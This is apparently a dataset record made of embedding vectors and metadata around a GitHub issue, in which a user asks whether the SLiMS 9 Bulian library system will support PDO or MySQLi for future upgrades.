0.0018571789842098951, 0.0028753734659403563, -0.004733553621917963, 0.009082656353712082, 0.003075608517974615, -0.011381353251636028, 0.0004703017766587436, 0.004769595805555582, 0.0039986916817724705, -0.012270396575331688, 0.028849847614765167, -0.008682186715304852, -0.02558201365172863, 0.0033599419984966516, 0.01329559925943613, -0.0008930477779358625, 0.012718922458589077, -0.01987932249903679, -0.0156823992729187, 0.0007603921112604439, -0.00828972551971674, 0.009611275978386402, -0.007737077306956053, -0.007136372849345207, -0.000017645703337620944, -0.02929837442934513, 0.01270290371030569, 0.018453650176525116, 0.008850383572280407, -0.0019312658114358783, 0.012526696547865868, -0.016483338549733162, -0.012150255031883717, 0.0043130600824952126, 0.007845204323530197, 0.009699380025267601, -0.00011701228504534811, -0.005518474616110325, -0.008658158592879772, -0.002629084512591362, -0.007520823739469051, 0.0032277870923280716, -0.015842586755752563, 0.004345098044723272, -0.011781822890043259, 0.004549337550997734, -0.02630285918712616, -0.010508328676223755, -0.0016018793685361743, -0.00755686592310667, -0.004789619240909815, -0.012782997451722622, -0.0077210585586726665, -0.0037083509378135204, -0.01116509921848774, 0.027712514623999596, -0.014953544363379478, 0.02186565473675728, -0.013135410845279694, -0.006904100067913532, 0.0026571175549179316, -0.0017210191581398249, 0.014104547910392284, -0.0034480453468859196, -0.011661682277917862, 0.011501493863761425, -0.003399989102035761, -0.00800939742475748, -0.000234650302445516, -0.0006327423616312444, -0.011781822890043259, 0.02875373512506485, 0.011741776019334793, 0.015874624252319336, -0.004681492689996958, 0.019462835043668747, -0.005402338225394487, -0.022906875237822533, -0.02228214219212532, -0.006199273280799389, 0.009659333154559135, -0.00008359808271052316, -0.015554249286651611, 0.025005336850881577, -0.003974663093686104, 0.009531182236969471, -0.0033138880971819162, -0.0011873930925503373, -0.007128363475203514, -0.012142245657742023, -0.0278246458619833, -0.011085005477070808, 0.01304730772972107, 0.022554462775588036, 0.006231310777366161, -0.019719135016202927, -0.03421614319086075, 0.01528192963451147, 0.009266871958971024, 0.004893741570413113, -0.0011663684854283929, 0.0006868058117106557, -0.013559909537434578, 0.015313967131078243, 0.003850517561659217, -0.01384824700653553, -0.014472980052232742, -0.004473248030990362, -0.02519756369292736, 0.004793623927980661, 0.013255552388727665, 0.004973835777491331, -0.009963690303266048, -0.023835966363549232, 0.003694334300234914, -0.011085005477070808, 0.016819734126329422, -0.002488920232281089, -0.01890217699110508, -0.0010752615053206682, -0.012102198787033558, -0.011645663529634476, -0.0059349630028009415, 0.031348779797554016, -0.008385838940739632, -0.010940836742520332, 0.015698418021202087, 0.0264310110360384, 0.008377829566597939, 0.010476291179656982, -0.0005836848285980523, -0.008922467939555645, 0.007132368162274361, -0.00745274405926466, 0.01970311626791954, 0.01625106669962406, 0.01818133145570755, -0.0016989933792501688, 0.006751921493560076, 0.008978534489870071, -0.0009566223598085344, 0.011797841638326645, -0.009370994754135609, -0.0022846804931759834, 0.013968388549983501, 0.01931866630911827, 0.013431758619844913, -0.0008089491166174412, 0.010203971527516842, 0.005514469929039478, -0.009715398773550987, 0.012823044322431087, 0.006824006326496601, -0.0069321333430707455, -0.026879535987973213, -0.009226825088262558, -0.015017619356513023, -0.006343442481011152, -0.01361597515642643, 0.021641390398144722, -0.013287589885294437, 0.015169798396527767, 0.010083830915391445, -0.02325928956270218, 0.014841413125395775, 0.013511852361261845, -0.009699380025267601, 0.00007552611350547522, 0.0026911573950201273, -0.02253844402730465, -0.0013255552621558309, -0.029987182468175888, 0.007480776868760586, 0.013672040775418282, -0.018677914515137672, -0.006499625742435455, -0.009362985379993916, 0.010139896534383297, -0.02668731100857258, 0.009459097869694233, 0.017188165336847305, -0.006775950081646442, -0.006767940707504749, 0.0030856202356517315, 0.0026170704513788223, -0.00905061885714531, -0.008489960804581642, 0.007068292703479528, 0.008249678649008274, 0.012847072444856167, 0.016947884112596512, -0.014352839440107346, -0.00114734610542655, 0.011621635407209396, -0.0026390962302684784, -0.003416007850319147, 0.004901750944554806, 0.0019422788172960281, 0.009771464392542839, -0.021497221663594246, -0.030211444944143295, -0.023868003860116005, 0.01872597075998783, -0.00011982808791799471, 0.025053393095731735, -0.01317545771598816, 0.004501281306147575, -0.01488145999610424, 0.007869232445955276, -0.011573579162359238, -0.002897399477660656, 0.0183575376868248, -0.023868003860116005, -0.008602092042565346, -0.0016749651404097676, 0.01805318146944046, 0.0074647581204771996, -0.014673215337097645, -0.005862878635525703, -0.02351558953523636, 0.003251815214753151, 0.014056491665542126, 0.016315141692757607, 0.01848568767309189, 0.037067487835884094, -0.0034200125373899937, 0.006439555436372757, -0.008409867063164711, -0.016627509146928787, -0.022970950230956078, -0.003680317895486951, -0.024028191342949867, -0.009539191611111164, 0.008465932682156563, -0.015794530510902405, -0.0020624196622520685, -0.024156341329216957, -0.01186191663146019, -0.0032257847487926483, -0.001555825350806117, 0.003075608517974615, -0.019927380606532097, 0.004517300054430962, 0.03091627173125744, 0.007252508774399757, -0.006611757446080446, -0.027936777099967003, -0.002384797902777791, -0.009250853210687637, 0.0088583929464221, 0.0013395716669037938, -0.012710913084447384, 0.011157089844346046, 0.007284546736627817, 0.02527765743434429, 0.025485901162028313, 0.0024128309451043606, -0.027600381523370743, 0.03194147348403931, 0.01957496628165245, 0.02308308146893978, -0.012839063070714474, -0.00228868518024683, 0.0032978691160678864, -0.0026390962302684784, -0.004228961654007435, 0.005610582418739796, 0.003347927937284112, -0.006888081319630146, -0.0018131271935999393, -0.004757581744343042, -0.024412641301751137, 0.038156766444444656, -0.005522479303181171, -0.009042609483003616, -0.00888242106884718, 0.003976665437221527, 0.023579664528369904, -0.0010742603335529566, 0.010139896534383297, -0.006067118141800165, -0.016963902860879898, -0.0008930477779358625, -0.005814822390675545, 0.004621421918272972, -0.005762760993093252, -0.0003584205114748329, -0.00044902681838721037, 0.009659333154559135, 0.006419531535357237, 0.013255552388727665, -0.010524347424507141, -0.006811992265284061, 0.0128951296210289, 0.014128576032817364, -0.004397158976644278, -0.00699620833620429, -0.017828917130827904, 0.007368645165115595, -0.01991136185824871, 0.015169798396527767, 0.006896090693771839, 0.003558174706995487, -0.010308094322681427, -0.013696068897843361, -0.010035774670541286, -0.00955521035939455, -0.027392137795686722, 0.009074646979570389, -0.006107165012508631, -0.014745299704372883, 0.021337034180760384, 0.010804676450788975, 0.007348621729761362, 0.004681492689996958, 0.038381028920412064, 0.005258169025182724, 0.004066771361976862, -0.006992203649133444, 0.016803715378046036, -0.007132368162274361, -0.011397371999919415, 0.014625159092247486, -0.001844163634814322, 0.006335433106869459, -0.004220952279865742, 0.011621635407209396, -0.00040372367948293686, -0.010059802792966366, -0.020327849313616753, 0.0049578165635466576, -0.005097981076687574, -0.006880071945488453, 0.0043891496025025845, -0.005722714122384787, -0.015530221164226532, 0.0035621793940663338, -0.0011123049771413207, -0.017284279689192772, -0.014272745698690414, -0.013920332305133343, -0.001215426018461585, -0.004030729178339243, -0.009691370651125908, -0.007276537362486124, 0.0076129320077598095, 0.01549818366765976, 0.004228961654007435, 0.004493271932005882, 0.005194094032049179, -0.020984619855880737, 0.013231524266302586, -0.017941050231456757, 0.01895023323595524, 0.025357751175761223, -0.0029214276000857353, 0.0022045865189284086, 0.012903138995170593, 0.0022866828367114067, 0.009138721972703934, -0.008842374198138714, 0.006940142717212439, -0.0005095978849567473, 0.007328598294407129, -0.0012124225031584501, -0.009523172862827778, 0.009979709051549435, 0.006171240471303463, 0.004369126167148352, 0.004381140228360891, -0.006115174852311611, -0.0033158904407173395, 0.010708563961088657, 0.018405593931674957, 0.00041774011333473027, -0.01446497067809105, 0.01291915774345398, -0.001462716143578291, 0.0010602439288049936, 0.013359674252569675, -0.002903406508266926, -0.016355188563466072, 0.0014396890765056014, -0.013575928285717964, 0.0003273840993642807, -0.015610314905643463, -0.005991029087454081, -0.01245461218059063, 0.01822938770055771, -0.009379004128277302, -0.005538498051464558, 0.008441904559731483, -0.015265910886228085, 0.008794317953288555, 0.010356150567531586, -0.006916114129126072, 0.00417690072208643, 0.014376867562532425, -0.009611275978386402, 0.0008740254561416805, 0.0032398011535406113, 0.011773813515901566, 0.010332122445106506, -0.004869713447988033, 0.000026781421183841303, -0.0023387440014630556, 0.001987331546843052, 0.011525521986186504, -0.002464891877025366, -0.026190727949142456, 0.015898652374744415, 0.0012334471102803946, -0.026959629729390144, 0.007592908572405577, -0.026703329756855965, -0.0041208346374332905, 0.009306919761002064, 0.017780860885977745, 0.0022986968979239464, -0.00641552684828639, 0.020455999299883842, -0.004006701055914164, -0.0009496141574345529, -0.02393207885324955, 0.017476504668593407, 0.015762493014335632, -0.007300565484911203, 0.00005659765156451613, -0.01130926888436079, -0.010163924656808376, -0.0068560438230633736, -0.00357219111174345, 0.007180424407124519, 0.026366934180259705, 0.0028773758094757795, 0.003968656063079834, -0.00027031716308556497, 0.023531608283519745, 0.009170759469270706, -0.027167875319719315, 0.0062112873420119286, 0.022682612761855125, -0.004273013211786747, -0.007913284003734589, 0.008417876437306404, 0.008217641152441502, -0.016723621636629105, -0.007849209010601044, 0.011958030052483082, 0.023115118965506554, -0.00015267913113348186, 0.013199485838413239, -0.007396677974611521, 0.0013455786975100636, -0.01653139479458332, 0.01302327960729599, 0.006259343586862087, -0.014256726950407028, 0.00008078227983787656, 0.002697164425626397, 0.0019803233444690704, 0.0023827955592423677, 0.015922680497169495, 0.015049656853079796, 0.013519861735403538, 0.010732592083513737, 0.02756834402680397, 0.0100197559222579, 0.01458511222153902, 0.03697137534618378, -0.000050747039495036006, -0.0020784386433660984, 0.0013505845563486218, 0.021465184167027473, 0.01232646219432354, 0.007997383363544941, -0.010236009024083614, -0.019126439467072487, 0.0016519381897524, 0.006035080645233393, 0.0005686671938747168, 0.01245461218059063, 0.004413177724927664, -0.008922467939555645, 0.01712409034371376, -0.0059069301933050156, 0.020023493096232414, 0.029250318184494972, -0.006215292029082775, -0.039181970059871674, -0.010356150567531586, 0.03395984321832657, 0.024877186864614487, -0.005790794268250465, -0.014681224711239338, -0.012582763098180294, 0.009226825088262558, -0.003828491782769561, 0.0027292019221931696, 0.01936672255396843, 0.00873024296015501, -0.020007474347949028, -0.024765055626630783, 0.005218122154474258, -0.004369126167148352, 0.0045453328639268875, -0.013648012652993202, -0.007416701875627041, 0.0011433414183557034, 0.017876973375678062, 0.002334739314392209, -0.0065156444907188416, 0.002689155051484704, -0.006655809003859758, -0.01601879484951496, 0.024332547560334206, -0.0018752000760287046, -0.00828972551971674, -0.023099100217223167, -0.006183254532516003, 0.02024775557219982, -0.0016869792016223073, 0.013904313556849957, 0.00143268087413162, 0.021048694849014282, 0.005194094032049179, -0.024556811898946762, -0.0026491081807762384, -0.011060977354645729, 0.027071762830018997, -0.005790794268250465, -0.003237798810005188, -0.030675990507006645, 0.005250159651041031, -0.006844029761850834, 0.011613626033067703, 0.012670866213738918, -0.02870567888021469, -0.00009999231406254694, 0.013271571137011051, -0.03975864499807358, -0.01962302252650261, 0.004128844011574984, 0.025742201134562492, -0.0029654791578650475, -0.0008760277996771038, 0.00957923848181963, -0.023868003860116005, -0.009667342528700829, -0.012174283154308796, 0.019414778798818588, 0.0000448338505520951, -0.023099100217223167, 0.01530595775693655, -0.0033959844149649143, -0.010067812167108059, -0.010652498342096806, 0.011093014851212502, 0.019126439467072487, -0.009627295657992363, 0.008249678649008274, 0.005586554296314716, 0.010980883613228798, 0.004074780736118555, -0.014769327826797962, 0.0020944573916494846, 0.004637440666556358, -0.003956642001867294, -0.017140109091997147, -0.0020784386433660984, -0.002561004599556327, 0.021321015432476997, -0.001336568151600659, 0.004365121480077505, 0.023275308310985565, 0.003644275711849332, 0.004537323489785194, -0.008141552098095417, -0.018165312707424164, -0.015794530510902405, -0.036554887890815735, 0.004881727509200573, 0.014136585406959057, 0.00036567903589457273, -0.03703545033931732, -0.01670760288834572, 0.018758008256554604, 0.016771677881479263, -0.01076462958008051, 0.011173108592629433, 0.009771464392542839, -0.023499570786952972, 0.014008435420691967, -0.005166061222553253, -0.008209631778299809, -0.0011343308724462986, 0.010980883613228798, 0.009395022876560688, 0.027167875319719315, -0.016691584140062332, 0.006936138030141592, 0.0059349630028009415, -0.01590666174888611, -0.017812898382544518, 0.026671292260289192, 0.010836713947355747, -0.024492736905813217, -0.016723621636629105, 0.0019232564372941852, 0.00982753001153469, -0.011661682277917862, -0.008738252334296703, 0.006171240471303463, -0.0017060015816241503, 0.006319414358586073, -0.01420867070555687, 0.009362985379993916, -0.016611488536000252, -0.0026871527079492807, 0.007913284003734589, 0.004026724491268396, 0.0020013481844216585, -0.01987932249903679, 0.005999038461595774, 0.010203971527516842, -0.0036402710247784853, 0.05709098279476166, -0.0034320265986025333, -0.006900095380842686, -0.0007724062306806445, -0.00835380144417286, -0.014953544363379478, -0.012478640303015709, -0.018341518938541412, 0.005442385096102953, -0.005987024400383234, -0.008938486687839031, -0.019590985029935837, -0.007392673287540674, 0.0037604118697345257, -0.0006853040540590882, 0.013159438967704773, 0.0005366295808926225, 0.01230243407189846, 0.008473942056298256, -0.014721271581947803, -0.0014176632976159453, 0.028657622635364532, 0.02473301813006401, 0.006755926180630922, -0.0007053275476209819, 0.008954505436122417, 0.0073085748590528965, 0.0018822082784026861, 0.0017090050969272852, -0.03112451732158661, 0.036683037877082825, 0.004485262557864189, 0.011974048800766468, -0.006908104754984379, 0.005001868586987257, 0.02249038591980934, -0.006647799629718065, 0.012935176491737366, -0.0001452954747946933, -0.024700980633497238, -0.011950020678341389, 0.012558734975755215, 0.01549818366765976, -0.002118485514074564, -0.0051260138861835, 0.017140109091997147, -0.03440836817026138, -0.006031075958162546, 0.004038738552480936, 0.017348354682326317, 0.005674657877534628, -0.0007068293052725494, 0.0146091403439641, 0.020055530592799187, 0.01200608629733324, 0.008481951430439949, -0.007132368162274361, -0.015466145239770412, -0.007392673287540674, -0.009731417521834373, 0.005342267919331789, -0.021417127922177315, 0.00913071259856224, -0.022634556517004967, -0.019927380606532097, 0.007180424407124519, -0.0013195481151342392, -0.00018959744193125516, 0.0018091225065290928, 0.0035021088551729918, 0.003932613879442215, -0.002985502826049924, -0.006523653864860535, -0.012286415323615074, 0.017300298437476158, -0.016963902860879898, 0.004657464567571878, -0.027328062802553177, -0.00039170956006273627, -0.025149507448077202, -0.020055530592799187, 0.014296773821115494, -0.013583937659859657, 0.0010282063158228993, -0.00928289070725441, -0.00343002425506711, 0.00473755830898881, 0.007628950756043196, 0.004393154289573431, 0.015698418021202087, 0.034312255680561066, 0.01965506002306938, 0.006651804316788912, -0.012823044322431087, 0.025678126141428947, -0.02135305292904377, -0.02862558513879776, -0.011317278258502483, -0.0030115332920104265, 0.0040207174606621265, -0.0029975168872624636, -0.003740388434380293, -0.02926633693277836, 0.000985155813395977, -0.0037984566297382116, 0.016899827867746353, -0.012758969329297543, -0.024893205612897873, -0.007644969504326582, 0.012478640303015709, -0.020504055544734, -0.008073472417891026, -0.01699594035744667, -0.003550165332853794, 0.004525309428572655, -0.0012855082750320435, 0.007200447842478752, 0.028353264555335045, -0.013527872040867805, 0.005266178399324417, -0.014256726950407028, 0.006487611681222916, 0.008618110790848732, -0.000440516829257831, 0.014681224711239338, 0.011381353251636028, -0.001629912294447422, 0.0018291460582986474, 0.03408799320459366, 0.019975436851382256, 0.00531823979690671, -0.0012784999562427402, 0.024332547560334206, 0.01577851176261902, 0.02152925916016102, 0.005674657877534628, -0.0069201188161969185, 0.03120461106300354, 0.019975436851382256, -0.0065076351165771484, 0.003223782405257225, 0.06465185433626175, 0.007809162139892578, -0.018197350203990936, 0.01014790590852499, 0.029234299436211586, 0.02261853776872158, -0.020920544862747192, -0.00873024296015501, -0.017476504668593407, 0.040271248668432236, 0.006167235784232616, 0.008810336701571941, 0.028609566390514374, -0.0200395118445158, 0.026190727949142456, 0.011221164837479591, 0.03251815214753151, 0.018629858270287514, 0.021785559132695198, 0.022938912734389305, 0.007284546736627817, 0.004421187099069357, 0.00686004851013422, 0.001462716143578291, -0.0008119526319205761, -0.000911068927962333, -0.008505979552865028, -0.006803982891142368, -0.00037994576268829405, -0.006083136890083551, -0.011653672903776169, -0.018085218966007233, 0.007436725310981274, 0.01541007962077856, 0.002228614641353488, 0.00585486926138401, -0.006619766820222139, 0.011389362625777721, -0.00010856487642740831, -0.013327636756002903, 0.00915474072098732, -0.01978321000933647, -0.005686671938747168, 0.029586711898446083, -0.004333083983510733, -0.019607003778219223, -0.011701729148626328, -0.005218122154474258, -0.004156877286732197, 0.00047756030107848346, 0.0008514990331605077, 0.009771464392542839, 0.008069467730820179, 0.011645663529634476, 0.023067062720656395, 0.0028133008163422346, -0.0014557079412043095, 0.023147158324718475, 0.016138935461640358, 0.014408905059099197, -0.009795492514967918, 0.00043926536454819143, 0.030964327976107597 ]
null
null
null
null
null
null
null
null
null
[ "slims", "slims9_bulian" ]
It seems to SLiMS 9 Bulian are using both PDO and MySQLi? Or an abstraction DB like ADOdb? Sometimes, I custom some codes for my library and I feel "something wrong", and I had to edit code lines , some cases it looked like PDO, and some case, it looks like MySQLi. So, I have a question: Should I use PDO or MySQLi? (for compatble in the future when I want to upgrade current SLiMS to a newer version?). SLiMS's developers will support which?
SLiMS uses PDO or MySQLi for future?
https://api.github.com/repos/slims/slims9_bulian/issues/212/comments
1
2023-09-20T04:20:54
2023-09-21T22:28:10Z
https://github.com/slims/slims9_bulian/issues/212
1,904,096,844
212
false
This is a GitHub Issue repo:slims9_bulian owner:slims Title : SLiMS uses PDO or MySQLi for future? Issue date: --- start body --- It seems to SLiMS 9 Bulian are using both PDO and MySQLi? Or an abstraction DB like ADOdb? Sometimes, I custom some codes for my library and I feel "something wrong", and I had to edit code lines , some cases it looked like PDO, and some case, it looks like MySQLi. So, I have a question: Should I use PDO or MySQLi? (for compatble in the future when I want to upgrade current SLiMS to a newer version?). SLiMS's developers will support which? --- end body ---
599
[ -0.00861549936234951, 0.025883475318551064, -0.021830862388014793, 0.0083048976957798, 0.01629919372498989, 0.036532677710056305, 0.011913794092833996, -0.0034240141976624727, -0.012719879858195782, 0.04706355556845665, 0.030379805713891983, -0.006193546112626791, 0.020499713718891144, 0.013274525292217731, -0.044549159705638885, 0.022378113120794296, -0.01048650499433279, 0.004511120263487101, -0.016550634056329727, -0.016846444457769394, -0.03179970011115074, -0.012719879858195782, 0.02301410771906376, -0.0008661720203235745, 0.0008338176994584501, 0.026371564716100693, -0.006533728912472725, -0.01560403872281313, -0.05472506210207939, 0.00405261293053627, 0.0018710055155679584, 0.01931646838784218, 0.029240932315587997, 0.017600763589143753, -0.01678728312253952, -0.013163596391677856, 0.017038721591234207, -0.011233428493142128, -0.0035663731396198273, 0.0168316550552845, 0.011810259893536568, -0.025173529982566833, 0.004940046463161707, 0.032302577048540115, -0.011277800425887108, 0.005646295379847288, -0.0016371298115700483, -0.020248273387551308, -0.00024265758111141622, -0.014820138923823833, -0.01393270492553711, 0.003586710197851062, -0.00046104940702207386, -0.01634356565773487, -0.008275317028164864, -0.02867889031767845, 0.03103058971464634, -0.007698485162109137, -0.02542496845126152, -0.041117750108242035, -0.03304210677742958, -0.002895251614972949, 0.05179653316736221, 0.02551371231675148, -0.008401036262512207, 0.03656226024031639, -0.0174972303211689, 0.05431092903017998, 0.0024201050400733948, 0.03534943237900734, -0.014576094225049019, 0.01202472299337387, 0.034225352108478546, 0.037686340510845184, 0.02867889031767845, 0.028072478249669075, 0.03827796131372452, -0.003514606272801757, -0.025306643918156624, -0.003449897514656186, -0.02996566891670227, -0.02653426118195057, -0.03966827690601349, 0.006552217062562704, 0.005224764347076416, -0.0037013371475040913, -0.008341874927282333, -0.06525593996047974, 0.007772438228130341, 0.010294227860867977, -0.011588402092456818, -0.0021224450320005417, 0.011063337326049805, 0.011839841492474079, 0.014494746923446655, -0.017615554854273796, -0.014339445158839226, 0.014701814390718937, -0.014531723223626614, -0.014753581024706364, -0.0006054884288460016, 0.0107971066609025, 0.012793832458555698, 0.025454549118876457, 0.0367693267762661, 0.03727220371365547, 0.004048915114253759, -0.020765943452715874, 0.004744071513414383, 0.08477947860956192, 0.015426551923155785, 0.011359148658812046, -0.029581114649772644, -0.008179178461432457, -0.004207913763821125, 0.024241723120212555, -0.004537003580480814, -0.04360256344079971, -0.003856637980788946, -0.031178494915366173, -0.030379805713891983, -0.008430617861449718, 0.008859544061124325, -0.03129681944847107, -0.03437325730919838, -0.0007635625079274178, -0.004814326297491789, -0.013607312925159931, 0.00699963141232729, 0.02221541665494442, -0.02934446558356285, 0.006585495546460152, -0.018192386254668236, -0.024818556383252144, -0.0007945302641019225, 0.04987376183271408, 0.027584390714764595, 0.017866993322968483, 0.02075115218758583, -0.020233482122421265, -0.029729021713137627, -0.03815963864326477, -0.003558977972716093, -0.02012994885444641, -0.00806085392832756, -0.01723099872469902, 0.03120807744562626, 0.023428242653608322, 0.020603246986865997, 0.0034776299726217985, -0.018103642389178276, -0.02992129884660244, 0.05079077556729317, -0.009872697293758392, -0.0015280494699254632, -0.011839841492474079, 0.01950874552130699, 0.023043688386678696, -0.03860335424542427, -0.01718662865459919, -0.02591305784881115, 0.052151504904031754, 0.011765888892114162, -0.013814380392432213, -0.008874334394931793, 0.016890816390514374, -0.006796261295676231, -0.0030524013563990593, -0.004877186380326748, 0.01572236232459545, -0.02440441958606243, 0.0038714285474270582, -0.04999208450317383, -0.025572873651981354, 0.005908827763050795, 0.02265913411974907, 0.037420108914375305, -0.03910623490810394, 0.011344357393682003, -0.0040156361646950245, 0.016595005989074707, -0.00762453256174922, -0.013015690259635448, -0.023250756785273552, 0.03505362197756767, -0.004093287046998739, 0.030527710914611816, 0.01931646838784218, 0.01740848645567894, 0.0059310137294232845, 0.007417464628815651, -0.015382179990410805, 0.00812741182744503, -0.014820138923823833, -0.0054872967302799225, 0.0010889548575505614, -0.036443933844566345, -0.05123449116945267, 0.006496752612292767, 0.004740373697131872, -0.001558555057272315, -0.07075802981853485, -0.05200359970331192, 0.025040414184331894, 0.016328776255249977, 0.004252285230904818, -0.01048650499433279, 0.02110612578690052, 0.027850620448589325, -0.051589466631412506, 0.039342883974313736, 0.0027048231568187475, -0.015500504523515701, 0.029640277847647667, -0.017556391656398773, 0.020337017253041267, 0.03179970011115074, -0.010516086593270302, -0.0006133459392003715, -0.024833345785737038, 0.00390840508043766, 0.005202578846365213, -0.028205594047904015, 0.013858752325177193, -0.008253131061792374, -0.0354381762444973, 0.0032446784898638725, 0.02903386391699314, -0.01297871395945549, 0.011351753026247025, 0.06839153915643692, 0.014117587357759476, 0.0016056998865678906, -0.022910574451088905, -0.03827796131372452, 0.0033981306478381157, 0.011477472260594368, -0.029773391783237457, -0.06791824102401733, 0.012705088593065739, 0.0010473564034327865, 0.06229782849550247, -0.008068249560892582, 0.00965823419392109, 0.0064338925294578075, -0.002213037107139826, 0.039875343441963196, -0.022111883386969566, -0.026608213782310486, -0.009266284294426441, -0.0015289739239960909, -0.03245048224925995, -0.0033426659647375345, 0.0062601035460829735, -0.005768317263573408, 0.000777428678702563, 0.04167979210615158, 0.045791566371917725, -0.0186065211892128, -0.01754160225391388, 0.011677145026624203, -0.014982834458351135, -0.07377529889345169, -0.012298348359763622, -0.012808622792363167, 0.007069886662065983, 0.0010020602494478226, 0.017482439056038857, 0.0005195183330215514, -0.0019782371819019318, 0.027125881984829903, -0.011189056560397148, -0.02564682625234127, 0.039875343441963196, 0.015367389656603336, -0.0056721786968410015, 0.006659448612481356, 0.012253977358341217, 0.0332195907831192, -0.01882837899029255, -0.0066520534455776215, 0.045347850769758224, -0.00986530166119337, 0.03842587023973465, 0.007572765462100506, 0.01121863815933466, -0.037508852779865265, -0.007058793678879738, -0.007095769979059696, 0.0023313616402447224, -0.02819080278277397, -0.009118379093706608, -0.018591731786727905, -0.01758597232401371, 0.017275370657444, -0.004474143497645855, 0.018532568588852882, 0.05744652450084686, -0.016328776255249977, -0.03860335424542427, 0.007617137394845486, -0.021668167784810066, 0.03138556331396103, -0.008186574093997478, 0.008622894994914532, -0.007735461462289095, 0.019390420988202095, 0.027140673249959946, -0.017260581254959106, -0.06969311088323593, -0.0026216262485831976, -0.03807089477777481, -0.0268004909157753, -0.016092127189040184, 0.013452012091875076, 0.06055254116654396, -0.008844753727316856, -0.012705088593065739, 0.0023609427735209465, -0.03316042944788933, -0.005986478179693222, -0.0005296868621371686, -0.027628760784864426, -0.016624586656689644, 0.04972585290670395, -0.030202317982912064, 0.0038788237143307924, -0.027214625850319862, -0.002532883081585169, -0.010752735659480095, -0.018177594989538193, -0.03404786437749863, -0.007151234429329634, -0.022954944521188736, -0.031503885984420776, -0.06472347676753998, -0.015323017723858356, 0.022762667387723923, -0.021742120385169983, 0.00865987129509449, -0.026963187381625175, 0.030438967049121857, 0.00046151160495355725, -0.014746186323463917, 0.018547359853982925, 0.0042116111144423485, 0.0021760608069598675, -0.021875234320759773, 0.029625486582517624, -0.017157046124339104, 0.0009678571368567646, -0.01178067922592163, -0.02274787798523903, -0.011263009160757065, 0.009221912361681461, -0.031592629849910736, -0.011765888892114162, -0.025306643918156624, -0.015041996724903584, 0.05756485089659691, 0.008571128360927105, -0.06987059116363525, -0.012475835159420967, 0.013866147957742214, 0.03067561611533165, 0.02489250898361206, -0.01838466338813305, -0.001970841782167554, 0.056618254631757736, -0.010249856859445572, -0.03250964730978012, -0.014110191725194454, 0.04380962997674942, 0.021742120385169983, -0.0578014999628067, 0.0358818918466568, 0.02765834331512451, 0.029107816517353058, 0.058038149029016495, 0.03339707851409912, 0.0054170419462025166, 0.0014328352408483624, -0.056529510766267776, 0.007502510212361813, -0.008637685328722, -0.0504949651658535, 0.04312926530838013, 0.02186044491827488, 0.015574457123875618, -0.04265596717596054, 0.009525119327008724, 0.020854685455560684, 0.015914639458060265, -0.05087951943278313, -0.027318159118294716, 0.010671387426555157, -0.01048650499433279, 0.0005222915788181126, 0.003253922564908862, -0.04874967783689499, 0.03807089477777481, -0.04780308157205582, -0.00801648199558258, 0.010922826826572418, 0.008245735429227352, -0.00666684377938509, 0.018576940521597862, -0.0409698449075222, -0.003986055497080088, 0.022733086720108986, -0.04162063077092171, -0.0006775924121029675, -0.014406003057956696, 0.0372130423784256, 0.004843907430768013, 0.02867889031767845, -0.03656226024031639, 0.02088426798582077, 0.02363531105220318, 0.023206384852528572, 0.020233482122421265, 0.005128625780344009, -0.023265548050403595, -0.01851777732372284, 0.005269136279821396, -0.00834926962852478, -0.0032631668727844954, 0.02617928758263588, 0.07484021782875061, -0.019567906856536865, -0.008423222228884697, 0.048601772636175156, 0.015737153589725494, -0.01647668145596981, 0.00011768892727559432, -0.012083885259926319, 0.018399452790617943, -0.013437221758067608, -0.011876817792654037, 0.015737153589725494, 0.02467064931988716, 0.010109346359968185, 0.008009087294340134, 0.05895516276359558, 0.011078127659857273, -0.010715759359300137, 0.0028065082151442766, -0.02644551731646061, 0.021431518718600273, -0.021032173186540604, 0.005513180512934923, -0.02609054371714592, 0.024241723120212555, -0.03594105318188667, 0.04522952437400818, -0.025883475318551064, -0.011063337326049805, -0.01900586672127247, 0.050021667033433914, 0.009872697293758392, -0.01856214925646782, 0.0491638146340847, 0.00017159357958007604, -0.00748032471165061, 0.03685807064175606, 0.0053541818633675575, 0.009332842193543911, 0.01924251578748226, -0.004566584713757038, -0.03428451344370842, 0.03703555464744568, -0.008489780128002167, 0.016358356922864914, -0.006038245279341936, -0.023753635585308075, 0.03076435998082161, 0.014398607425391674, 0.011514449492096901, -0.003612593747675419, 0.035733986645936966, -0.02631240151822567, -0.016713330522179604, 0.004355819430202246, -0.004063705913722515, -0.007942529395222664, 0.013496384024620056, -0.0053024147637188435, 0.03472822904586792, 0.01024246122688055, 0.011876817792654037, 0.007140141911804676, 0.01758597232401371, -0.018221966922283173, -0.030734779313206673, -0.031148914247751236, -0.002192700281739235, -0.0265786312520504, -0.0014577943366020918, 0.022940155118703842, 0.004806931130588055, 0.0013718241825699806, -0.013762613758444786, -0.014990230090916157, 0.013829171657562256, 0.05123449116945267, 0.026815280318260193, 0.0007390656974166632, -0.0014023297699168324, -0.0211504977196455, 0.03691723197698593, 0.0006979294121265411, 0.0018747032154351473, -0.003952776547521353, -0.012276162393391132, -0.0004649781621992588, 0.02795415371656418, 0.014176749624311924, -0.008245735429227352, 0.018177594989538193, 0.007428557612001896, 0.027540018782019615, -0.0023757333401590586, -0.021091334521770477, -0.0015419155824929476, 0.02814643085002899, 0.004740373697131872, 0.02863452024757862, 0.013015690259635448, 0.01980455592274666, -0.05827479809522629, -0.010538272559642792, 0.0000745305442251265, -0.007262163795530796, 0.016092127189040184, -0.004714490380138159, 0.009946649894118309, 0.027007557451725006, 0.012261372059583664, -0.0026733933482319117, 0.007861181162297726, -0.03650309517979622, 0.01124082412570715, 0.006241615395992994, -0.04132481664419174, 0.027318159118294716, -0.0011638320283964276, -0.01634356565773487, 0.014065820723772049, 0.027140673249959946, -0.004866093397140503, 0.013740427792072296, 0.02938883751630783, 0.02004120498895645, 0.018000109121203423, -0.0034092236310243607, -0.009813535027205944, 0.013747823424637318, 0.02146109938621521, 0.015959011390805244, -0.008467594161629677, -0.01709788478910923, 0.03286461904644966, 0.009939254261553288, -0.022407695651054382, -0.012971319258213043, -0.02484813705086708, -0.025173529982566833, 0.002127991523593664, 0.006603984162211418, -0.031237658113241196, -0.01709788478910923, 0.01621045172214508, -0.009310656227171421, -0.03514236584305763, 0.014287678524851799, 0.007191908545792103, 0.011499658226966858, 0.007617137394845486, -0.00006216656038304791, 0.004533305764198303, -0.006012361496686935, -0.017378905788064003, -0.014598280191421509, 0.018931914120912552, -0.0018552906112745404, 0.00861549936234951, 0.022585181519389153, -0.0014134226366877556, 0.011048546992242336, 0.004071101080626249, 0.03271671384572983, 0.004899372346699238, 